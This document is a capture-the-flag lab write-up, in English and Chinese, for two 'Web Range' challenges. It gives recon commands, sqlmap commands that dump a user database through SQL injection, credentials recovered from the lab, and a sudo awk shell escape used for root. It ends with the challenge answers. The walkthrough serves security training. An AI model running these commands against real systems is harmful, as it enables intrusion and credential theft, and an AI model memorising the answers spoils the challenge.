Web Range-121-122

# Web Range-121-122 ## Challenge 121 ## Challenge 122 ![image](https://hackmd.io/_uploads/H19cYsGYgg.png) * Rustscan * ![image](https://hackmd.io/_uploads/rJU7csfFxx.png) * Nmap * ![image](https://hackmd.io/_uploads/SJ4OjjfFll.png) * Nothing on FTP * ![image](https://hackmd.io/_uploads/BkMMiszteg.png) * Web一開始無法訪問，仔細看了Nmap scan result後發現他只allow HEAD, Header要送 `Host: 127.0.0.1` * ![image](https://hackmd.io/_uploads/S1FQVhfYlg.png) * Using `curl` 指定method是HEAD, 再自訂封包內容後拿到response，就發現一個路徑 `index.php` * ![image](https://hackmd.io/_uploads/ryVTN2ftlx.png) * ![image](https://hackmd.io/_uploads/HJm-BnMYxg.png) * ![image](https://hackmd.io/_uploads/HyQMB2GKgx.png) * Is a login page called `MaxMinter`, but not a CMS, and no cve, try register a user * ![image](https://hackmd.io/_uploads/r1EDU2Mtxx.png) * 用 `feroxbuster` 掃了路徑, 一樣要用HEAD掃然後指定header * ![image](https://hackmd.io/_uploads/S1Bku3zFxe.png) ```zsh= feroxbuster -u http://10.10.1.57 -H "Host: 127.0.1.1" -X HEAD ``` * 隨便猜到了一個test帳號 * ![image](https://hackmd.io/_uploads/BktKO2GYxl.png) * `test@test.com:123456` * 但似乎不太能幹嘛 * ![image](https://hackmd.io/_uploads/rygz0_2Gtel.png) * 有個功能可以Request Remote Access, 但是這個user他說 permission denied * ![image](https://hackmd.io/_uploads/HyWItnftlx.png) * ![image](https://hackmd.io/_uploads/HyDpKnzKel.png) * OK, login and register page 都有sqli * ![image](https://hackmd.io/_uploads/rJmxZTftxx.png) ```zsh= sqlmap -r login_req --level 5 --risk 3 --batch --dbs sqlmap -r login_req --level 5 --risk 3 --batch -D maxminter --tables sqlmap -r login_req --level 5 --risk 3 --batch -D maxminter --T users --columns --dump ``` * Got admin credential, and login sucessful * ![image](https://hackmd.io/_uploads/SkprXaMFlg.png) * ![image](https://hackmd.io/_uploads/BkiTS6GFxl.png) * `admin@gmail.com:asd%$gasd23_` * ![image](https://hackmd.io/_uploads/SJejXTMYee.png) * About Remote Access, 看來我們要找到具有RAU權限的user, 因為連我們自己都沒有權限 * ![image](https://hackmd.io/_uploads/Hk7zVTfYxx.png) * ![image](https://hackmd.io/_uploads/rko8S6GFxg.png) * Jackson有RAU permission, 登入request RAU後拿到一組credential * ![image](https://hackmd.io/_uploads/S1ZKSpztxg.png) * ![image](https://hackmd.io/_uploads/HJQfUazFxe.png) * `jackson:ABfg34$#@_W` * Shell as jackson via ssh * ![image](https://hackmd.io/_uploads/BkRHU6MYxx.png) * ![image](https://hackmd.io/_uploads/ByoYIpzKee.png) * `awk` 提權 * ![image](https://hackmd.io/_uploads/Bka3U6fYxx.png) * https://gtfobins.github.io/gtfobins/awk/#sudo * ![image](https://hackmd.io/_uploads/SydyvpGtlx.png) ```zsh= sudo awk 'BEGIN {system("/bin/sh")}' ``` * Proof * ![image](https://hackmd.io/_uploads/SJiBwpfYle.png) ## Answer * Challenge 121:`2` * Challenge 122:`q22L32WL`